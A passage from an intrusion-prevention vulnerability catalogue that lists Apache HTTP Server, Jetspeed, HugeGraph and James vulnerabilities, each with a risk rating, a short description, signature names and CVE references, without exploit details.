Description: A denial of service vulnerability exists in Apache HTTP server. The vulnerability exists in the mod_deflate module and is due to a resource exhaustion that is related to request body decompression configuration. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would exhaust available memory, CPU and file-system resources to cause a denial of service condition on the target.
Situation: HTTP_Decompression-Ratio-Large
References:
CVE-2014-0118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118
BID-68745
http://www.securityfocus.com/bid/68745
OSVDB-109231
http://www.osvdb.org/109231
Back to top

Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: A denial of service vulnerability exists in Apache HTTP server. The vulnerability is due to a log processing error in the mod_log_config module when cookies are logged, that can result in the crash of worker threads. This vulnerability only affects servers that are logging cookies and are using a threaded MPM (the default on Linux and Windows). A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in a denial of service condition on the target.
Situation: HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service
HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service-2
References:
CVE-2014-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098
BID-66303
http://www.securityfocus.com/bid/66303
OSVDB-104580
http://www.osvdb.org/104580
Back to top

Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Resource Starvation
Description: A denial of service vulnerability exists in Apache HTTP server. The vulnerability exists in the mod_proxy module and is due to an error handling malformed HTTP headers. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in a denial of service condition on the target.
Situation: HTTP_CSH-Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service
References:
CVE-2014-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0117
OSVDB-109232
http://www.osvdb.org/109232
Back to top

Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: There exist a cross-site scripting vulnerability in Apache mod_proxy_ftp module.
Situation: HTTP_CSU-Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS
References:
CVE-2008-2939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2939
BID-30560
http://www.securityfocus.com/bid/30560
Back to top

Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Input Validation
Description: A command execution vulnerability exists in Apache HTTP web server mod_rewrite. The vulnerability is due to a lack of input validation in handling certain escape sequences when writing to the log file. A remote attacker can exploit these vulnerabilities by sending a specially crafted HTTP request. Successful exploitation could result in attacker controlled script command executing.
Situation: HTTP_CSU-Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution
References:
CVE-2013-1862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862
BID-64758
http://www.securityfocus.com/bid/64758
OSVDB-93366
http://www.osvdb.org/93366
Back to top

Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-485-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Input Validation
Description: There is a denial of service vulnerability in the mod_rpaf module of Apache's HTTP Server. The vulnerability is caused by an error when processing certain HTTP headers. An unauthenticated, remote attacker can exploit this vulnerability by sending HTTP requests with malicious X-Forwarded-for headers to a target. This could lead to a segmentation fault resulting in a denial of service condition.
Situation: HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service
References:
CVE-2012-3526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3526
BID-55154
http://www.securityfocus.com/bid/55154
OSVDB-84911
http://www.osvdb.org/84911
Back to top

Apache-HTTP-Server-Mod_status-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server (httpd)
Risk: High
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Race Condition
Description: A heap buffer overflow vulnerability exists in Apache httpd. The vulnerability is due to a race condition in the mod_status module running on a server with threaded MPM. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted requests to the server status page. Successful exploit may result in information disclosure or code execution.
Situation: HTTP_CSU-General-Server-Status-Client-URI
File-Text_General-Server-Status-Stream
References:
CVE-2014-0226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226
BID-68678
http://www.securityfocus.com/bid/68678
OSVDB-109216
http://www.osvdb.org/109216
Back to top

Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability

About this vulnerability: A vulnerability in Apache Software Foundation mod_tcl Module
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Format String
Description: There exists a format string vulnerability in the mod_tcl module used with the Apache HTTP server. The vulnerability is due to the failure of the application in verifying string arguments that are passed to a formatting function, resulting in a memory corruption condition. A remote attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the httpd process. In a simple attack exploiting this vulnerability, the httpd process serving the attacker terminates, closing the connection as a result. This might also reset other connections served by the affected httpd process, in the case the HTTP server is configured to run in multiple-threading mode. In the case of a more sophisticated attack, the injected arbitrary code is executed with the privileges of the httpd process. The behaviour of the target system will be dependent on the malicious code.
Situation: HTTP_CS-Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability
References:
CVE-2006-4154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4154
BID-20527
http://www.securityfocus.com/bid/20527
OSVDB-29536
http://www.osvdb.org/29536
Back to top

Apache-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability: Denial of service vulnerability in Apache HTTP Server
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows ME
Software: Apache
Type: Malfunction
Description: Apache HTTP Server is vulnerable to a Denial of Service (DoS) attack, caused by a vulnerability in the ap_directory_walk function. By sending an HTTP GET request for a DOS device name to the Web server, a remote attacker could cause the system to crash.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2003-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0016
BID-6662
http://www.securityfocus.com/bid/6662
OSVDB-9708
http://www.osvdb.org/9708
Back to top

Apache-HTTP-Server-Path-Traversal-CVE-2021-41773

About this vulnerability: A vulnerability in Apache HTTP Server
Risk: High
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1394-5242
Platform: Generic
Software: Apache
Type: Directory Traversal
Description: A path traversal vulnerability has been reported in Apache HTTP Server version 2.4.49. This situation covers also CVE-2021-42013.
Situation: HTTP_CSU-Apache-HTTP-Server-Path-Traversal-CVE-2021-41773
References:
CVE-2021-41773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
Back to top

Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Platform: Windows
Software: Apache
Type: Malfunction
Description: Improper HTTP request path processing on Windows hosts causes an NTLM relay vulnerability in the Apache web server. A successful exploitation may lead to the disclosure of a reusable NTLM hash.
Situation: HTTP_CSU-Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay
References:
CVE-2024-38472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38472
Back to top

Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-956-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: Improper handling of a malformed HTTP request header causes an out of bounds read vulnerability in the Apache HTTP server. Successful exploitation of the vulnerability causes a denial of service condition.
Situation: HTTP_CSH-Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read
References:
CVE-2017-7668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7668
Back to top

Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: An information disclosure vulnerability has been identified in Apache httpd. The vulnerability is due to an error while creating the default HTTP 400 error page. If a custom handler for the HTTP 400 error code is not specified, the default handler could expose httpOnly cookies to the attacker. A remote, unauthenticated attacker can exploit this vulnerability by causing the target user's browser to send specific HTTP requests to the vulnerable server. A successful attack will result in disclosure of potentially sensitive information in httpOnly cookies.
Situation: HTTP_CSH-Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure
HTTP_CSH-Very-Long-Cookie-Header
References:
CVE-2012-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053
BID-51706
http://www.securityfocus.com/bid/51706
OSVDB-78556
http://www.osvdb.org/78556
Back to top

Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: Improper handling of a regular expression match of the URL file name causes a security restriction bypass vulnerability in the Apache HTTP server. A successful exploit allows an attacker to upload arbitrary files to the target system.
Situation: HTTP_CSU-Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass
References:
CVE-2017-15715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15715
BID-103525
http://www.securityfocus.com/bid/103525
Back to top

Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Apache httpd
Risk: Moderate
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: There has been reported a memory corruption vulnerability in Apache httpd application. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRH-Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption
References:
CVE-2020-9490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9490
Back to top

Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: Moderate
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: Improper processing of authorization headers in HTTP requests causes a memory access error in Apache httpd. A successful exploit allows an attacker to cause a denial of service condition on the target system or disclose information thereon.
Situation: HTTP_CSH-Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service
References:
CVE-2017-9788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9788
Back to top

Apache-Httpd-Mod_Cache_socache-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: High
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation httpd
Type: Integer Overflow
Description: A denial-of-service vulnerability has been reported in Apache httpd. The vulnerability is due to improper validation of the headers in HTTP requests. A remote attacker can exploit this vulnerability by sending specially crafted HTTP requests to the target system. Successful exploitation can lead to service crash and denial-of-service conditions on the target system.
Situation: HTTP_CSH-Request-With-Multiple-Header-Lines-With-Empty-Content
References:
CVE-2018-1303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1303
BID-103522
http://www.securityfocus.com/bid/103522
Back to top

Apache-Httpd-Mod_Cgi-Handler-Confusion

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1788-5242
Platform: Generic
Software: Apache2
Type: Malfunction
Description: Improper processing of request data causes a handler confusion vulnerability in mod_cgi of the Apache web server. A successful exploitation allows an attacker to inject headers and possibly execute code on the target system.
Situation: HTTP_CRL-Apache-Httpd-Mod_Cgi-Handler-Confusion
References:
CVE-2024-38476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38476
Back to top

Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service

About this vulnerability: A vulnerability in Apache HTTP Server
Risk: High
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Generic
Software: Apache
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in the Apache httpd module mod_http2. The vulnerability is due to improper validation of HTTP/2 requests with an initial window size of zero. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in denial of service conditions on the target server.
Situation: HTTP2_SETTINGS-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
HTTP_CSH-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
References:
CVE-2023-43622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43622
Back to top

Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: Improper handling of HTTP protocol headers related to protocol upgrade causes a null pointer dereference in the Apache HTTP server. A successful exploit allows an attacker to cause a denial of service condition on the target system.
Situation: HTTP_CS-Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference
References:
CVE-2017-7659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7659
Back to top

Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: A denial of service vulnerability has been identified in Apache httpd. The vulnerability is due to an error while logging crafted HTTP requests by mod_log_config. If the '%{cookiename}C' log format is in use, certain cookies can cause the server to crash. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. A successful attack will crash the server resulting in a denial-of-service condition.
Situation: HTTP_CSH-Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service
References:
CVE-2012-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021
BID-51705
http://www.securityfocus.com/bid/51705
OSVDB-78555
http://www.osvdb.org/78555
Back to top

Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service

About this vulnerability: A vulnerability in Apache httpd.
Risk: High
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: A vulnerability in Apache httpd, versions prior to 2.4.53, which allows remote attackers to cause a denial of service condition by sending a crafted request to the target server, due to use of uninitialized memory when processing a request.
Situation: HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service
References:
CVE-2022-22719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22719
Back to top

Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow

About this vulnerability: A vulnerability in Apache Software Foundation httpd.
Risk: High
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1425-5242
Platform: Generic
Software: Apache Software Foundation httpd
Type: Integer Overflow
Description: A vulnerability in Apache Software Foundation httpd, versions before 2.4.52, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to the improper validation of the request body in the module's multipart parser, called via the r:parsebody() function in Lua scripts.
Situation: HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow
References:
CVE-2021-44790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44790
Back to top

Apache-Httpd-Mod_Md-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: Moderate
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Input Validation
Description: Insufficient input validation in the md_require_https_maybe() and md_http_challenge_pr() functions causes a null pointer dereference vulnerability in the Apache HTTP server. A successful exploit can cause a denial of service condition.
Situation: HTTP_CSU-Apache-Httpd-Mod_Md-Null-Pointer-Dereference
References:
CVE-2018-8011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8011
Back to top

Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: Moderate
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Platform: Generic
Software: Apache Software Foundation httpd
Type: Malfunction
Description: Improper handling of malformed Request-URIs sent to the server when configured as a forward proxy causes a null pointer dereference vulnerability in Apache Httpd. A successful exploit can cause a denial of service condition or access to a domain socket endpoint.
Situation: HTTP_CSU-Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference
References:
CVE-2021-44224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44224
Back to top

Apache-Httpd-Mod_Proxy-Security-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache mod_proxy; IBM HTTP Server for OS/400
Type: Malfunction
Description: A security bypass vulnerability has been identified in the Apache HTTP Server's reverse proxy module mod_proxy. The vulnerability is due to an input validation error when mod_proxy handles a URI under certain RewriteRule or ProxyPassMatch directives in the configuration. A remote attacker can exploit this vulnerabilities by sending a malicious request to the target server. A successful attack can lead to exposure of internal servers and their resources to outside users.
Situation: HTTP_CS-Apache-Httpd-Mod_Proxy-Security-Bypass
HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass
HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass-2
References:
CVE-2011-3368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368
BID-49957
http://www.securityfocus.com/bid/49957
OSVDB-76079
http://www.osvdb.org/76079
Back to top

Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: Moderate
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Platform: Generic
Software: Apache Software Foundation httpd
Type: Malfunction
Description: Missing validation of the unix socket path in an HTTP request causes a server-side request forgery vulnerability in Apache HTTPd. A successful exploit can allow an attacker to access data on the target system or spoof content.
Situation: HTTP_CRL-Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery
References:
CVE-2021-40438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438
Back to top

Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: High
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Input Validation
Description: A denial of service vulnerability has been identified in Apache httpd. The vulnerability is due to an error while processing crafted HTTP requests by mod_proxy_ajp when used with mod_proxy_balancer. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted HTTP requests to the vulnerable server. A successful attack will put the server into an error state until the retry timeout is expired, resulting in a temporary denial-of-service.
Situation: HTTP_CS-Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service
References:
CVE-2011-3348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348
BID-49616
http://www.securityfocus.com/bid/49616
OSVDB-75647
http://www.osvdb.org/75647
Back to top

Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: High
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Input Validation
Description: A cross site scripting vulnerability exists in Apache HTTP web server mod_proxy_balancer. The vulnerability is due to a lack of input validation in the URI of the mod_proxy_balancer manager interface. A remote attacker can exploit these vulnerabilities by enticing a user to follow a specially crafted web link. Successful exploitation could result in attacker controlled script code executing in the browser of the affected user.
Situation: HTTP_CSU-Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting
References:
CVE-2012-4558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558
BID-58165
http://www.securityfocus.com/bid/58165
Back to top

Apache-Httpd-Mod_remoteip-Buffer-Overflow

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: Moderate
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Buffer Overflow
Description: There has been reported a buffer overflow in mod_remoteip component of Apache httpd. Successful attack can lead in remote code execution..
Situation: HTTP_CS-Apache-Httpd-Mod_remoteip-Buffer-Overflow
References:
CVE-2019-10097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10097
Back to top

Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service

About this vulnerability: A vulnerability in Apache httpd.
Risk: High
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Platform: Generic
Software: Apache Software Foundation httpd
Type: Input Validation
Description: A vulnerability in Apache httpd, versions prior to 2.4.54, which allows remote attackers to create a denial of service condition by sending crafted requests, do to improper input validation for the mod_sed module.
Situation: HTTP_CS-Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service
References:
CVE-2022-30522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30522
Back to top

Apache-Httpd-Mod_sed-Integer-Overflow

About this vulnerability: A vulnerability in Apache Software Foundation httpd.
Risk: High
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1481-5242
Platform: Generic
Software: Apache Software Foundation httpd
Type: Integer Overflow
Description: A vulnerability in Apache Software Foundation httpd, versions prior to 2.4.53, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to mixing signed and unsigned values when processing mod_sed requests.
Situation: HTTP_CSH-Apache-Httpd-Mod_sed-Integer-Overflow
References:
CVE-2022-23943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23943
Back to top

Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation httpd
Risk: High
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation httpd
Type: Infinite Loop
Description: A denial-of-service vulnerability has been reported in Apache httpd. The vulnerability is due to improper handling of client-initiated renegotiation when using OpenSSL version 1.1.1. A remote attacker could exploit this vulnerability by sending crafted request including performing a TLS renegotiation to the target server. Successful exploitation could result in httpd entering infinite loop and denial of service condition.
Situation: HTTPS_SS-Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service
References:
CVE-2019-0190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0190
Back to top

Apache-Httpd-Multiple-Mime-Headers-DoS

About this vulnerability: Denial of Service vulnerability in Apache HTTP server
Risk: Low
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: Apache HTTP Server versions 1.3.1 and earlier are vulnerable to a Denial of Service (DoS) attack. A remote attacker can send multiple copies of MIME headers to the server to consume 100% of the CPU resources. Also known as the "sioux" vulnerability.
Situation: HTTP_CSH-Apache-Httpd-Multiple-Mime-Headers-DoS-2
References:
CVE-1999-1199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1199
OSVDB-9707
http://www.osvdb.org/9707
Back to top

Apache-Httpd-Range-Header-Field-Memory-Exhaustion

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Resource Starvation
Description: A memory exhaustion vulnerability has been identified in Apache httpd. The vulnerability is due to an error while parsing the Range header field. A malformed Ranges field causes the program to consume excessive resources. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. A successful attack will cause a denial-of-service condition by causing the server to become unresponsive.
Situation: Analyzer_Apache-httpd-Range-Header-Field-Memory-Exhaustion
HTTP_CSH-Apache-Httpd-Range-Header-Field-Memory-Exhaustion
References:
CVE-2011-3192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
BID-49303
http://www.securityfocus.com/bid/49303
OSVDB-74721
http://www.osvdb.org/74721
Back to top

Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348

About this vulnerability: A vulnerability in Apache HugeGraph
Risk: High
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Platform: Generic
Software: Apache HugeGraph
Type: Input Validation
Description: A code injection vulnerability has been reported for Apache HugeGraph. The vulnerability is due to insufficient input validation of Gremlin scripts, leading to sandbox escape. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution in the context of the application.
Situation: HTTP_CRL-Apache-Hugegraph-CVE-2024-27348-Suspicious-String-In-Gremlin-Query
HTTP_CRL-Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348
References:
CVE-2024-27348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27348
Back to top

Apache-ISAPI-Module-Dangling-Pointer

About this vulnerability: A vulnerability in Apache web server
Risk: High
First detected in: sgpkg-ips-291-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apache
Type: Malfunction
Description: There is a vulnerability in the Windows version of Apache web server. A specially crafted request referring to services of a previously unloaded ISAPI module may lead to arbitrary code execution in the security context of the web server.
Situation: HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer-2
HTTP_CSH-Apache-ISAPI-Module-Dangling-Pointer
HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer
References:
CVE-2010-0425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425
BID-38494
http://www.securityfocus.com/bid/38494
Back to top

Apache-James-Server-Insecure-User-Creation

About this vulnerability: A vulnerability in Apache James Server
Risk: High
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Apache James Server
Type: Input Validation
Description: There exists a vulnerability in Apache James Server, version 2.3.2, which allows remote attackers to create users and upload arbitrary files.
Situation: Generic_CS-Apache-James-Server-Insecure-User-Creation
References:
CVE-2015-7611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7611
Back to top

Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation Jetspeed
Risk: High
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Jetspeed
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in Apache Jetspeed 2. A remote, unauthenticated attacker can use this to execute arbitrary code in the user's browser.
Situation: HTTP_CRL-Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting
References:
CVE-2016-0711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0711
Back to top

Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation Jetspeed
Risk: Moderate
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Jetspeed
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Apache Jetspeed Portal Site Manager. A remote, authenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-Zip_Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal
References:
CVE-2016-0709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0709
Back to top

Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation Jetspeed
Risk: Moderate
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Jetspeed
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Apache Jetspeed 2. The vulnerability is due to insufficient validation of the "/portal" URI path. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim user to visit a crafted web site. Successful exploitation allows the attacker to execute arbitrary scripts in the user's browser.
Situation: HTTP_CSU-Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting
References:
CVE-2016-0712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0712
Back to top

